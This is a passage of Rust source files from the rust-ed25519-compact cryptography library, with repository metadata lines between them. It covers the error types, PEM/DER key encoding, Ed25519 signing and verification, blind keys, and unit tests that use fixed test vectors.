/// The noise doesn't have the expected length.
InvalidNoise,
/// Parse error
ParseError,
/// Non-canonical encoding
NonCanonical,
}
#[cfg(feature = "std")]
impl std::error::Error for Error {}
impl Display for Error {
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
match self {
Error::SignatureMismatch => write!(f, "Signature doesn't verify"),
Error::WeakPublicKey => write!(f, "Weak public key"),
Error::InvalidPublicKey => write!(f, "Invalid public key"),
Error::InvalidSecretKey => write!(f, "Invalid secret key"),
Error::InvalidSignature => write!(f, "Invalid signature"),
Error::InvalidSeed => write!(f, "Invalid seed length"),
Error::InvalidBlind => write!(f, "Invalid blind length"),
Error::InvalidNoise => write!(f, "Invalid noise length"),
Error::ParseError => write!(f, "Parse error"),
Error::NonCanonical => write!(f, "Non-canonical encoding"),
}
}
}
| rust | MIT | 661a45223bece49b3ad8da33fe0f3a408ea895c1 | 2026-01-04T20:21:43.974864Z | false |
jedisct1/rust-ed25519-compact | https://github.com/jedisct1/rust-ed25519-compact/blob/661a45223bece49b3ad8da33fe0f3a408ea895c1/src/pem.rs | src/pem.rs | #[cfg(feature = "std")]
use ct_codecs::Encoder;
use ct_codecs::{Base64, Decoder};
use super::{Error, KeyPair, PublicKey, SecretKey, Seed};
const DER_HEADER_SK: [u8; 16] = [48, 46, 2, 1, 0, 48, 5, 6, 3, 43, 101, 112, 4, 34, 4, 32];
const DER_HEADER_PK: [u8; 12] = [48, 42, 48, 5, 6, 3, 43, 101, 112, 3, 33, 0];
impl KeyPair {
/// Import a key pair from an OpenSSL-compatible DER file.
pub fn from_der(der: &[u8]) -> Result<Self, Error> {
if der.len() != DER_HEADER_SK.len() + Seed::BYTES || der[0..16] != DER_HEADER_SK {
return Err(Error::ParseError);
}
let mut seed = [0u8; Seed::BYTES];
seed.copy_from_slice(&der[16..]);
let kp = KeyPair::from_seed(Seed::new(seed));
Ok(kp)
}
/// Import a key pair from an OpenSSL-compatible PEM file.
pub fn from_pem(pem: &str) -> Result<Self, Error> {
let mut it = pem.split("-----BEGIN PRIVATE KEY-----");
let _ = it.next().ok_or(Error::ParseError)?;
let inner = it.next().ok_or(Error::ParseError)?;
let mut it = inner.split("-----END PRIVATE KEY-----");
let b64 = it.next().ok_or(Error::ParseError)?;
let _ = it.next().ok_or(Error::ParseError)?;
let mut der = [0u8; 16 + Seed::BYTES];
Base64::decode(&mut der, b64, Some(b"\r\n\t ")).map_err(|_| Error::ParseError)?;
Self::from_der(&der)
}
/// Export a key pair as an OpenSSL-compatible PEM file.
#[cfg(feature = "std")]
pub fn to_pem(&self) -> String {
format!("{}\n{}\n", self.sk.to_pem().trim(), self.pk.to_pem().trim())
}
}
impl SecretKey {
/// Import a secret key from an OpenSSL-compatible DER file.
pub fn from_der(der: &[u8]) -> Result<Self, Error> {
let kp = KeyPair::from_der(der)?;
Ok(kp.sk)
}
/// Import a secret key from an OpenSSL-compatible PEM file.
pub fn from_pem(pem: &str) -> Result<Self, Error> {
let kp = KeyPair::from_pem(pem)?;
Ok(kp.sk)
}
/// Export a secret key as an OpenSSL-compatible DER file.
#[cfg(feature = "std")]
pub fn to_der(&self) -> Vec<u8> {
let mut der = [0u8; 16 + Seed::BYTES];
der[0..16].copy_from_slice(&DER_HEADER_SK);
der[16..].copy_from_slice(self.seed().as_ref());
der.to_vec()
}
/// Export a secret key as an OpenSSL-compatible PEM file.
#[cfg(feature = "std")]
pub fn to_pem(&self) -> String {
let b64 = Base64::encode_to_string(self.to_der()).unwrap();
format!(
"-----BEGIN PRIVATE KEY-----\n{}\n-----END PRIVATE KEY-----\n",
b64
)
}
}
impl PublicKey {
/// Import a public key from an OpenSSL-compatible DER file.
pub fn from_der(der: &[u8]) -> Result<Self, Error> {
if der.len() != DER_HEADER_PK.len() + PublicKey::BYTES || der[0..12] != DER_HEADER_PK {
return Err(Error::ParseError);
}
let mut pk = [0u8; PublicKey::BYTES];
pk.copy_from_slice(&der[12..]);
let pk = PublicKey::new(pk);
Ok(pk)
}
/// Import a public key from an OpenSSL-compatible PEM file.
pub fn from_pem(pem: &str) -> Result<Self, Error> {
let mut it = pem.split("-----BEGIN PUBLIC KEY-----");
let _ = it.next().ok_or(Error::ParseError)?;
let inner = it.next().ok_or(Error::ParseError)?;
let mut it = inner.split("-----END PUBLIC KEY-----");
let b64 = it.next().ok_or(Error::ParseError)?;
let _ = it.next().ok_or(Error::ParseError)?;
let mut der = [0u8; 12 + PublicKey::BYTES];
Base64::decode(&mut der, b64, Some(b"\r\n\t ")).map_err(|_| Error::ParseError)?;
Self::from_der(&der)
}
/// Export a public key as an OpenSSL-compatible DER file.
#[cfg(feature = "std")]
pub fn to_der(&self) -> Vec<u8> {
let mut der = [0u8; 12 + PublicKey::BYTES];
der[0..12].copy_from_slice(&DER_HEADER_PK);
der[12..].copy_from_slice(self.as_ref());
der.to_vec()
}
/// Export a public key as an OpenSSL-compatible PEM file.
#[cfg(feature = "std")]
pub fn to_pem(&self) -> String {
let b64 = Base64::encode_to_string(self.to_der()).unwrap();
format!(
"-----BEGIN PUBLIC KEY-----\n{}\n-----END PUBLIC KEY-----\n",
b64
)
}
}
#[test]
fn test_pem() {
let sk_pem = "-----BEGIN PRIVATE KEY-----
MC4CAQAwBQYDK2VwBCIEIMXY1NUbUe/3dW2YUoKW5evsnCJPMfj60/q0RzGne3gg
-----END PRIVATE KEY-----\n";
let sk = SecretKey::from_pem(sk_pem).unwrap();
let pk_pem = "-----BEGIN PUBLIC KEY-----
MCowBQYDK2VwAyEAyrRjJfTnhMcW5igzYvPirFW5eUgMdKeClGzQhd4qw+Y=
-----END PUBLIC KEY-----\n";
let pk = PublicKey::from_pem(pk_pem).unwrap();
assert_eq!(sk.public_key(), pk);
#[cfg(feature = "std")]
{
let sk_pem2 = sk.to_pem();
let pk_pem2 = pk.to_pem();
assert_eq!(sk_pem, sk_pem2);
assert_eq!(pk_pem, pk_pem2);
}
}
#[test]
fn test_der() {
let kp = KeyPair::generate();
let sk_der = kp.sk.to_der();
let sk2 = SecretKey::from_der(&sk_der).unwrap();
let pk_der = kp.pk.to_der();
let pk2 = PublicKey::from_der(&pk_der).unwrap();
assert_eq!(kp.sk, sk2);
assert_eq!(kp.pk, pk2);
}
| rust | MIT | 661a45223bece49b3ad8da33fe0f3a408ea895c1 | 2026-01-04T20:21:43.974864Z | false |
jedisct1/rust-ed25519-compact | https://github.com/jedisct1/rust-ed25519-compact/blob/661a45223bece49b3ad8da33fe0f3a408ea895c1/src/ed25519.rs | src/ed25519.rs | use core::convert::TryFrom;
use core::fmt;
use core::ops::{Deref, DerefMut};
use super::common::*;
#[cfg(feature = "blind-keys")]
use super::edwards25519::{ge_scalarmult, sc_invert, sc_mul};
use super::edwards25519::{
ge_scalarmult_base, is_identity, sc_muladd, sc_reduce, sc_reduce32, sc_reject_noncanonical,
GeP2, GeP3,
};
use super::error::Error;
use super::sha512;
/// A public key.
#[derive(Copy, Clone, Debug, Eq, PartialEq, Hash)]
pub struct PublicKey([u8; PublicKey::BYTES]);
impl PublicKey {
/// Number of raw bytes in a public key.
pub const BYTES: usize = 32;
/// Creates a public key from raw bytes.
pub fn new(pk: [u8; PublicKey::BYTES]) -> Self {
PublicKey(pk)
}
/// Creates a public key from a slice.
pub fn from_slice(pk: &[u8]) -> Result<Self, Error> {
let mut pk_ = [0u8; PublicKey::BYTES];
if pk.len() != pk_.len() {
return Err(Error::InvalidPublicKey);
}
pk_.copy_from_slice(pk);
Ok(PublicKey::new(pk_))
}
}
impl Deref for PublicKey {
type Target = [u8; PublicKey::BYTES];
/// Returns a public key as bytes.
fn deref(&self) -> &Self::Target {
&self.0
}
}
impl DerefMut for PublicKey {
/// Returns a public key as mutable bytes.
fn deref_mut(&mut self) -> &mut Self::Target {
&mut self.0
}
}
/// A secret key.
#[derive(Clone, Debug, Eq, PartialEq, Hash)]
pub struct SecretKey([u8; SecretKey::BYTES]);
impl SecretKey {
/// Number of bytes in a secret key.
pub const BYTES: usize = 32 + PublicKey::BYTES;
/// Creates a secret key from raw bytes.
pub fn new(sk: [u8; SecretKey::BYTES]) -> Self {
SecretKey(sk)
}
/// Creates a secret key from a slice.
pub fn from_slice(sk: &[u8]) -> Result<Self, Error> {
let mut sk_ = [0u8; SecretKey::BYTES];
if sk.len() != sk_.len() {
return Err(Error::InvalidSecretKey);
}
sk_.copy_from_slice(sk);
Ok(SecretKey::new(sk_))
}
/// Returns the public counterpart of a secret key.
pub fn public_key(&self) -> PublicKey {
let mut pk = [0u8; PublicKey::BYTES];
pk.copy_from_slice(&self[Seed::BYTES..]);
PublicKey(pk)
}
/// Returns the seed of a secret key.
pub fn seed(&self) -> Seed {
Seed::from_slice(&self[0..Seed::BYTES]).unwrap()
}
/// Returns `Ok(())` if the given public key is the public counterpart of
/// this secret key.
/// Returns `Err(Error::InvalidPublicKey)` otherwise.
/// The public key is recomputed (not just copied) from the secret key,
/// so this will detect corruption of the secret key.
pub fn validate_public_key(&self, pk: &PublicKey) -> Result<(), Error> {
let kp = KeyPair::from_seed(self.seed());
if kp.pk != *pk {
return Err(Error::InvalidPublicKey);
}
Ok(())
}
}
impl Drop for SecretKey {
fn drop(&mut self) {
Mem::wipe(&mut self.0)
}
}
impl Deref for SecretKey {
type Target = [u8; SecretKey::BYTES];
/// Returns a secret key as bytes.
fn deref(&self) -> &Self::Target {
&self.0
}
}
impl DerefMut for SecretKey {
/// Returns a secret key as mutable bytes.
fn deref_mut(&mut self) -> &mut Self::Target {
&mut self.0
}
}
/// A key pair.
#[derive(Clone, Debug, Eq, PartialEq, Hash)]
pub struct KeyPair {
/// Public key part of the key pair.
pub pk: PublicKey,
/// Secret key part of the key pair.
pub sk: SecretKey,
}
/// An Ed25519 signature.
#[derive(Copy, Clone, Eq, PartialEq, Hash)]
pub struct Signature([u8; Signature::BYTES]);
impl fmt::Debug for Signature {
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
f.write_fmt(format_args!("{:x?}", &self.0))
}
}
impl TryFrom<&[u8]> for Signature {
type Error = Error;
fn try_from(slice: &[u8]) -> Result<Self, Self::Error> {
Signature::from_slice(slice)
}
}
impl AsRef<[u8]> for Signature {
fn as_ref(&self) -> &[u8] {
&self.0
}
}
impl Signature {
/// Number of raw bytes in a signature.
pub const BYTES: usize = 64;
/// Creates a signature from raw bytes.
pub fn new(bytes: [u8; Signature::BYTES]) -> Self {
Signature(bytes)
}
/// Creates a signature key from a slice.
pub fn from_slice(signature: &[u8]) -> Result<Self, Error> {
let mut signature_ = [0u8; Signature::BYTES];
if signature.len() != signature_.len() {
return Err(Error::InvalidSignature);
}
signature_.copy_from_slice(signature);
Ok(Signature::new(signature_))
}
}
impl Deref for Signature {
type Target = [u8; Signature::BYTES];
/// Returns a signture as bytes.
fn deref(&self) -> &Self::Target {
&self.0
}
}
impl DerefMut for Signature {
/// Returns a signature as mutable bytes.
fn deref_mut(&mut self) -> &mut Self::Target {
&mut self.0
}
}
/// The state of a streaming verification operation.
#[derive(Clone)]
pub struct VerifyingState {
hasher: sha512::Hash,
signature: Signature,
a: GeP3,
}
impl Drop for VerifyingState {
fn drop(&mut self) {
Mem::wipe(&mut self.signature.0);
}
}
impl VerifyingState {
fn new(pk: &PublicKey, signature: &Signature) -> Result<Self, Error> {
let r = &signature[0..32];
let s = &signature[32..64];
sc_reject_noncanonical(s)?;
if is_identity(pk) || pk.iter().fold(0, |acc, x| acc | x) == 0 {
return Err(Error::WeakPublicKey);
}
let a = match GeP3::from_bytes_negate_vartime(pk) {
Some(g) => g,
None => {
return Err(Error::InvalidPublicKey);
}
};
let mut hasher = sha512::Hash::new();
hasher.update(r);
hasher.update(&pk[..]);
Ok(VerifyingState {
hasher,
signature: *signature,
a,
})
}
/// Appends data to the message being verified.
pub fn absorb(&mut self, chunk: impl AsRef<[u8]>) {
self.hasher.update(chunk)
}
/// Verifies the signature and return it.
pub fn verify(&self) -> Result<(), Error> {
let mut expected_r_bytes = [0u8; 32];
expected_r_bytes.copy_from_slice(&self.signature[0..32]);
let expected_r =
GeP3::from_bytes_vartime(&expected_r_bytes).ok_or(Error::InvalidSignature)?;
let s = &self.signature[32..64];
let mut hash = self.hasher.finalize();
sc_reduce(&mut hash);
let r = GeP2::double_scalarmult_vartime(hash.as_ref(), self.a, s);
if (expected_r - GeP3::from(r)).has_small_order() {
Ok(())
} else {
Err(Error::SignatureMismatch)
}
}
}
impl PublicKey {
/// Verify the signature of a multi-part message (streaming).
pub fn verify_incremental(&self, signature: &Signature) -> Result<VerifyingState, Error> {
VerifyingState::new(self, signature)
}
/// Verifies that the signature `signature` is valid for the message
/// `message`.
pub fn verify(&self, message: impl AsRef<[u8]>, signature: &Signature) -> Result<(), Error> {
let mut st = VerifyingState::new(self, signature)?;
st.absorb(message);
st.verify()
}
}
/// The state of a streaming signature operation.
#[derive(Clone)]
pub struct SigningState {
hasher: sha512::Hash,
az: [u8; 64],
nonce: [u8; 64],
}
impl Drop for SigningState {
fn drop(&mut self) {
Mem::wipe(&mut self.az);
Mem::wipe(&mut self.nonce);
}
}
impl SigningState {
fn new(nonce: [u8; 64], az: [u8; 64], pk_: &[u8]) -> Self {
let mut prefix: [u8; 64] = [0; 64];
let r = ge_scalarmult_base(&nonce[0..32]);
prefix[0..32].copy_from_slice(&r.to_bytes()[..]);
prefix[32..64].copy_from_slice(pk_);
let mut st = sha512::Hash::new();
st.update(prefix);
SigningState {
hasher: st,
nonce,
az,
}
}
/// Appends data to the message being signed.
pub fn absorb(&mut self, chunk: impl AsRef<[u8]>) {
self.hasher.update(chunk)
}
/// Computes the signature and return it.
pub fn sign(&self) -> Signature {
let mut signature: [u8; 64] = [0; 64];
let r = ge_scalarmult_base(&self.nonce[0..32]);
signature[0..32].copy_from_slice(&r.to_bytes()[..]);
let mut hram = self.hasher.finalize();
sc_reduce(&mut hram);
sc_muladd(
&mut signature[32..64],
&hram[0..32],
&self.az[0..32],
&self.nonce[0..32],
);
Signature(signature)
}
}
impl SecretKey {
/// Sign a multi-part message (streaming API).
/// It is critical for `noise` to never repeat.
pub fn sign_incremental(&self, noise: Noise) -> SigningState {
let seed = &self[0..32];
let pk = &self[32..64];
let az: [u8; 64] = {
let mut hash_output = sha512::Hash::hash(seed);
hash_output[0] &= 248;
hash_output[31] &= 63;
hash_output[31] |= 64;
hash_output
};
let mut st = sha512::Hash::new();
#[cfg(feature = "random")]
{
let additional_noise = Noise::generate();
st.update(additional_noise.as_ref());
}
st.update(noise.as_ref());
st.update(seed);
let nonce = st.finalize();
SigningState::new(nonce, az, pk)
}
/// Computes a signature for the message `message` using the secret key.
/// The noise parameter is optional, but recommended in order to mitigate
/// fault attacks.
pub fn sign(&self, message: impl AsRef<[u8]>, noise: Option<Noise>) -> Signature {
let seed = &self[0..32];
let pk = &self[32..64];
let az: [u8; 64] = {
let mut hash_output = sha512::Hash::hash(seed);
hash_output[0] &= 248;
hash_output[31] &= 63;
hash_output[31] |= 64;
hash_output
};
let nonce = {
let mut hasher = sha512::Hash::new();
if let Some(noise) = noise {
hasher.update(&noise[..]);
hasher.update(&az[..]);
} else {
hasher.update(&az[32..64]);
}
hasher.update(&message);
let mut hash_output = hasher.finalize();
sc_reduce(&mut hash_output[0..64]);
hash_output
};
let mut st = SigningState::new(nonce, az, pk);
st.absorb(&message);
let signature = st.sign();
#[cfg(feature = "self-verify")]
{
PublicKey::from_slice(pk)
.expect("Key length changed")
.verify(message, &signature)
.expect("Newly created signature cannot be verified");
}
signature
}
}
impl KeyPair {
/// Number of bytes in a key pair.
pub const BYTES: usize = SecretKey::BYTES;
/// Generates a new key pair.
#[cfg(feature = "random")]
pub fn generate() -> KeyPair {
KeyPair::from_seed(Seed::default())
}
/// Generates a new key pair using a secret seed.
pub fn from_seed(seed: Seed) -> KeyPair {
if seed.iter().fold(0, |acc, x| acc | x) == 0 {
panic!("All-zero seed");
}
let (scalar, _) = {
let hash_output = sha512::Hash::hash(&seed[..]);
KeyPair::split(&hash_output, false, true)
};
let pk = ge_scalarmult_base(&scalar).to_bytes();
let mut sk = [0u8; 64];
sk[0..32].copy_from_slice(&*seed);
sk[32..64].copy_from_slice(&pk);
KeyPair {
pk: PublicKey(pk),
sk: SecretKey(sk),
}
}
/// Creates a key pair from a slice.
pub fn from_slice(bytes: &[u8]) -> Result<Self, Error> {
let sk = SecretKey::from_slice(bytes)?;
let pk = sk.public_key();
Ok(KeyPair { pk, sk })
}
/// Clamp a scalar.
pub fn clamp(scalar: &mut [u8]) {
scalar[0] &= 248;
scalar[31] &= 63;
scalar[31] |= 64;
}
/// Split a serialized representation of a key pair into a secret scalar and
/// a prefix.
pub fn split(bytes: &[u8; 64], reduce: bool, clamp: bool) -> ([u8; 32], [u8; 32]) {
let mut scalar = [0u8; 32];
scalar.copy_from_slice(&bytes[0..32]);
if clamp {
Self::clamp(&mut scalar);
}
if reduce {
sc_reduce32(&mut scalar);
}
let mut prefix = [0u8; 32];
prefix.copy_from_slice(&bytes[32..64]);
(scalar, prefix)
}
/// Check that the public key is valid for the secret key.
pub fn validate(&self) -> Result<(), Error> {
self.sk.validate_public_key(&self.pk)
}
}
impl Deref for KeyPair {
type Target = [u8; KeyPair::BYTES];
/// Returns a key pair as bytes.
fn deref(&self) -> &Self::Target {
&self.sk
}
}
impl DerefMut for KeyPair {
/// Returns a key pair as mutable bytes.
fn deref_mut(&mut self) -> &mut Self::Target {
&mut self.sk
}
}
/// Noise, for non-deterministic signatures.
#[derive(Copy, Clone, Debug, Eq, PartialEq, Hash)]
pub struct Noise([u8; Noise::BYTES]);
impl Noise {
/// Number of raw bytes for a noise component.
pub const BYTES: usize = 16;
/// Creates a new noise component from raw bytes.
pub fn new(noise: [u8; Noise::BYTES]) -> Self {
Noise(noise)
}
/// Creates noise from a slice.
pub fn from_slice(noise: &[u8]) -> Result<Self, Error> {
let mut noise_ = [0u8; Noise::BYTES];
if noise.len() != noise_.len() {
return Err(Error::InvalidNoise);
}
noise_.copy_from_slice(noise);
Ok(Noise::new(noise_))
}
}
impl Deref for Noise {
type Target = [u8; Noise::BYTES];
/// Returns the noise as bytes.
fn deref(&self) -> &Self::Target {
&self.0
}
}
impl DerefMut for Noise {
/// Returns the noise as mutable bytes.
fn deref_mut(&mut self) -> &mut Self::Target {
&mut self.0
}
}
#[cfg(feature = "random")]
impl Default for Noise {
/// Generates random noise.
fn default() -> Self {
let mut noise = [0u8; Noise::BYTES];
getrandom::fill(&mut noise).expect("RNG failure");
Noise(noise)
}
}
#[cfg(feature = "random")]
impl Noise {
/// Generates random noise.
pub fn generate() -> Self {
Noise::default()
}
}
#[cfg(feature = "traits")]
mod ed25519_trait {
use ::ed25519::signature as ed25519_trait;
use super::{PublicKey, SecretKey, Signature};
impl ed25519_trait::SignatureEncoding for Signature {
type Repr = Signature;
}
impl ed25519_trait::Signer<Signature> for SecretKey {
fn try_sign(&self, message: &[u8]) -> Result<Signature, ed25519_trait::Error> {
Ok(self.sign(message, None))
}
}
impl ed25519_trait::Verifier<Signature> for PublicKey {
fn verify(
&self,
message: &[u8],
signature: &Signature,
) -> Result<(), ed25519_trait::Error> {
#[cfg(feature = "std")]
{
self.verify(message, signature)
.map_err(ed25519_trait::Error::from_source)
}
#[cfg(not(feature = "std"))]
{
self.verify(message, signature)
.map_err(|_| ed25519_trait::Error::new())
}
}
}
}
#[test]
fn test_ed25519() {
let kp = KeyPair::from_seed([42u8; 32].into());
let message = b"Hello, World!";
let signature = kp.sk.sign(message, None);
assert!(kp.pk.verify(message, &signature).is_ok());
assert!(kp.pk.verify(b"Hello, world!", &signature).is_err());
assert_eq!(
signature.as_ref(),
[
196, 182, 1, 15, 182, 182, 231, 166, 227, 62, 243, 85, 49, 174, 169, 9, 162, 196, 98,
104, 30, 81, 22, 38, 184, 136, 253, 128, 10, 160, 128, 105, 127, 130, 138, 164, 57, 86,
94, 160, 216, 85, 153, 139, 81, 100, 38, 124, 235, 210, 26, 95, 231, 90, 73, 206, 33,
216, 171, 15, 188, 181, 136, 7,
]
);
}
#[cfg(feature = "blind-keys")]
mod blind_keys {
use super::*;
#[derive(Clone, Debug, Eq, PartialEq, Hash)]
pub struct Blind([u8; Blind::BYTES]);
impl From<[u8; 32]> for Blind {
fn from(blind: [u8; 32]) -> Self {
Blind(blind)
}
}
impl Blind {
/// Number of raw bytes in a blind.
pub const BYTES: usize = 32;
/// Creates a blind from raw bytes.
pub fn new(blind: [u8; Blind::BYTES]) -> Self {
Blind(blind)
}
/// Creates a blind from a slice.
pub fn from_slice(blind: &[u8]) -> Result<Self, Error> {
let mut blind_ = [0u8; Blind::BYTES];
if blind.len() != blind_.len() {
return Err(Error::InvalidBlind);
}
blind_.copy_from_slice(blind);
Ok(Blind::new(blind_))
}
}
impl Drop for Blind {
fn drop(&mut self) {
Mem::wipe(&mut self.0)
}
}
#[cfg(feature = "random")]
impl Default for Blind {
/// Generates a random blind.
fn default() -> Self {
let mut blind = [0u8; Blind::BYTES];
getrandom::fill(&mut blind).expect("RNG failure");
Blind(blind)
}
}
#[cfg(feature = "random")]
impl Blind {
/// Generates a random blind.
pub fn generate() -> Self {
Blind::default()
}
}
impl Deref for Blind {
type Target = [u8; Blind::BYTES];
/// Returns a blind as bytes.
fn deref(&self) -> &Self::Target {
&self.0
}
}
impl DerefMut for Blind {
/// Returns a blind as mutable bytes.
fn deref_mut(&mut self) -> &mut Self::Target {
&mut self.0
}
}
/// A blind public key.
#[derive(Copy, Clone, Debug, Eq, PartialEq, Hash)]
pub struct BlindPublicKey([u8; PublicKey::BYTES]);
impl Deref for BlindPublicKey {
type Target = [u8; BlindPublicKey::BYTES];
/// Returns a public key as bytes.
fn deref(&self) -> &Self::Target {
&self.0
}
}
impl DerefMut for BlindPublicKey {
/// Returns a public key as mutable bytes.
fn deref_mut(&mut self) -> &mut Self::Target {
&mut self.0
}
}
impl BlindPublicKey {
/// Number of bytes in a blind public key.
pub const BYTES: usize = PublicKey::BYTES;
/// Creates a blind public key from raw bytes.
pub fn new(bpk: [u8; PublicKey::BYTES]) -> Self {
BlindPublicKey(bpk)
}
/// Creates a blind public key from a slice.
pub fn from_slice(bpk: &[u8]) -> Result<Self, Error> {
let mut bpk_ = [0u8; PublicKey::BYTES];
if bpk.len() != bpk_.len() {
return Err(Error::InvalidPublicKey);
}
bpk_.copy_from_slice(bpk);
Ok(BlindPublicKey::new(bpk_))
}
/// Unblinds a public key.
pub fn unblind(&self, blind: &Blind, ctx: impl AsRef<[u8]>) -> Result<PublicKey, Error> {
let pk_p3 = GeP3::from_bytes_vartime(&self.0).ok_or(Error::InvalidPublicKey)?;
let mut hx = sha512::Hash::new();
hx.update(&blind[..]);
hx.update([0u8]);
hx.update(ctx.as_ref());
let hash_output = hx.finalize();
let (blind_factor, _) = KeyPair::split(&hash_output, true, false);
let inverse = sc_invert(&blind_factor);
Ok(PublicKey(ge_scalarmult(&inverse, &pk_p3).to_bytes()))
}
/// Verifies that the signature `signature` is valid for the message
/// `message`.
pub fn verify(
&self,
message: impl AsRef<[u8]>,
signature: &Signature,
) -> Result<(), Error> {
PublicKey::new(self.0).verify(message, signature)
}
}
impl From<PublicKey> for BlindPublicKey {
fn from(pk: PublicKey) -> Self {
BlindPublicKey(pk.0)
}
}
impl From<BlindPublicKey> for PublicKey {
fn from(bpk: BlindPublicKey) -> Self {
PublicKey(bpk.0)
}
}
/// A blind secret key.
#[derive(Clone, Debug, Eq, PartialEq, Hash)]
pub struct BlindSecretKey {
pub prefix: [u8; 2 * Seed::BYTES],
pub blind_scalar: [u8; 32],
pub blind_pk: BlindPublicKey,
}
#[derive(Clone, Debug, Eq, PartialEq, Hash)]
pub struct BlindKeyPair {
/// Public key part of the blind key pair.
pub blind_pk: BlindPublicKey,
/// Secret key part of the blind key pair.
pub blind_sk: BlindSecretKey,
}
impl BlindSecretKey {
/// Computes a signature for the message `message` using the blind
/// secret key. The noise parameter is optional, but recommended
/// in order to mitigate fault attacks.
pub fn sign(&self, message: impl AsRef<[u8]>, noise: Option<Noise>) -> Signature {
let nonce = {
let mut hasher = sha512::Hash::new();
if let Some(noise) = noise {
hasher.update(&noise[..]);
hasher.update(self.prefix);
} else {
hasher.update(self.prefix);
}
hasher.update(&message);
let mut hash_output = hasher.finalize();
sc_reduce(&mut hash_output[0..64]);
hash_output
};
let mut signature: [u8; 64] = [0; 64];
let r = ge_scalarmult_base(&nonce[0..32]);
signature[0..32].copy_from_slice(&r.to_bytes()[..]);
signature[32..64].copy_from_slice(&self.blind_pk.0);
let mut hasher = sha512::Hash::new();
hasher.update(signature.as_ref());
hasher.update(&message);
let mut hram = hasher.finalize();
sc_reduce(&mut hram);
sc_muladd(
&mut signature[32..64],
&hram[0..32],
&self.blind_scalar,
&nonce[0..32],
);
let signature = Signature(signature);
#[cfg(feature = "self-verify")]
{
PublicKey::from_slice(&self.blind_pk.0)
.expect("Key length changed")
.verify(message, &signature)
.expect("Newly created signature cannot be verified");
}
signature
}
}
impl Drop for BlindSecretKey {
fn drop(&mut self) {
Mem::wipe(&mut self.prefix);
Mem::wipe(&mut self.blind_scalar);
}
}
impl PublicKey {
/// Returns a blind version of the public key.
pub fn blind(&self, blind: &Blind, ctx: impl AsRef<[u8]>) -> Result<BlindPublicKey, Error> {
let (blind_factor, _prefix2) = {
let mut hx = sha512::Hash::new();
hx.update(&blind[..]);
hx.update([0u8]);
hx.update(ctx.as_ref());
let hash_output = hx.finalize();
KeyPair::split(&hash_output, true, false)
};
let pk_p3 = GeP3::from_bytes_vartime(&self.0).ok_or(Error::InvalidPublicKey)?;
Ok(BlindPublicKey(
ge_scalarmult(&blind_factor, &pk_p3).to_bytes(),
))
}
}
impl KeyPair {
/// Returns a blind version of the key pair.
pub fn blind(&self, blind: &Blind, ctx: impl AsRef<[u8]>) -> BlindKeyPair {
let seed = self.sk.seed();
let (scalar, prefix1) = {
let hash_output = sha512::Hash::hash(&seed[..]);
KeyPair::split(&hash_output, false, true)
};
let (blind_factor, prefix2) = {
let mut hx = sha512::Hash::new();
hx.update(&blind[..]);
hx.update([0u8]);
hx.update(ctx.as_ref());
let hash_output = hx.finalize();
KeyPair::split(&hash_output, true, false)
};
let blind_scalar = sc_mul(&scalar, &blind_factor);
let blind_pk = ge_scalarmult_base(&blind_scalar).to_bytes();
let mut prefix = [0u8; 2 * Seed::BYTES];
prefix[0..32].copy_from_slice(&prefix1);
prefix[32..64].copy_from_slice(&prefix2);
let blind_pk = BlindPublicKey::new(blind_pk);
BlindKeyPair {
blind_pk,
blind_sk: BlindSecretKey {
prefix,
blind_scalar,
blind_pk,
},
}
}
}
}
#[cfg(feature = "blind-keys")]
pub use blind_keys::*;
#[test]
#[cfg(all(feature = "blind-keys", feature = "random"))]
fn test_blind_ed25519() {
use ct_codecs::{Decoder, Hex};
let kp = KeyPair::generate();
let blind = Blind::new([69u8; 32]);
let blind_kp = kp.blind(&blind, "ctx");
let message = b"Hello, World!";
let signature = blind_kp.blind_sk.sign(message, None);
assert!(blind_kp.blind_pk.verify(message, &signature).is_ok());
let recovered_pk = blind_kp.blind_pk.unblind(&blind, "ctx").unwrap();
assert!(recovered_pk == kp.pk);
let kp = KeyPair::from_seed(
Seed::from_slice(
&Hex::decode_to_vec(
"875532ab039b0a154161c284e19c74afa28d5bf5454e99284bbcffaa71eebf45",
None,
)
.unwrap(),
)
.unwrap(),
);
assert_eq!(
Hex::decode_to_vec(
"3b5983605b277cd44918410eb246bb52d83adfc806ccaa91a60b5b2011bc5973",
None
)
.unwrap(),
kp.pk.as_ref()
);
let blind = Blind::from_slice(
&Hex::decode_to_vec(
"c461e8595f0ac41d374f878613206704978115a226f60470ffd566e9e6ae73bf",
None,
)
.unwrap(),
)
.unwrap();
let blind_kp = kp.blind(&blind, "ctx");
assert_eq!(
Hex::decode_to_vec(
"246dcd43930b81d5e4d770db934a9fcd985b75fd014bc2a98b0aea02311c1836",
None
)
.unwrap(),
blind_kp.blind_pk.as_ref()
);
let message = Hex::decode_to_vec("68656c6c6f20776f726c64", None).unwrap();
let signature = blind_kp.blind_sk.sign(message, None);
assert_eq!(Hex::decode_to_vec("947bacfabc63448f8955dc20630e069e58f37b72bb433ae17f2fa904ea860b44deb761705a3cc2168a6673ee0b41ff7765c7a4896941eec6833c1689315acb0b",
None).unwrap(), signature.as_ref());
}
#[cfg(feature = "random")]
#[test]
fn test_streaming() {
let kp = KeyPair::generate();
let msg1 = "mes";
let msg2 = "sage";
let mut st = kp.sk.sign_incremental(Noise::default());
st.absorb(msg1);
st.absorb(msg2);
let signature = st.sign();
let msg1 = "mess";
let msg2 = "age";
let mut st = kp.pk.verify_incremental(&signature).unwrap();
st.absorb(msg1);
st.absorb(msg2);
assert!(st.verify().is_ok());
}
#[test]
#[cfg(feature = "random")]
fn test_ed25519_invalid_keypair() {
let kp1 = KeyPair::generate();
let kp2 = KeyPair::generate();
assert_eq!(
kp1.sk.validate_public_key(&kp2.pk).unwrap_err(),
Error::InvalidPublicKey
);
assert_eq!(
kp2.sk.validate_public_key(&kp1.pk).unwrap_err(),
Error::InvalidPublicKey
);
assert!(kp1.sk.validate_public_key(&kp1.pk).is_ok());
assert!(kp2.sk.validate_public_key(&kp2.pk).is_ok());
assert!(kp1.validate().is_ok());
}
| rust | MIT | 661a45223bece49b3ad8da33fe0f3a408ea895c1 | 2026-01-04T20:21:43.974864Z | false |
jedisct1/rust-ed25519-compact | https://github.com/jedisct1/rust-ed25519-compact/blob/661a45223bece49b3ad8da33fe0f3a408ea895c1/src/common.rs | src/common.rs | use core::ops::{Deref, DerefMut};
use core::ptr;
use core::sync::atomic;
use super::error::Error;
/// A seed, which a key pair can be derived from.
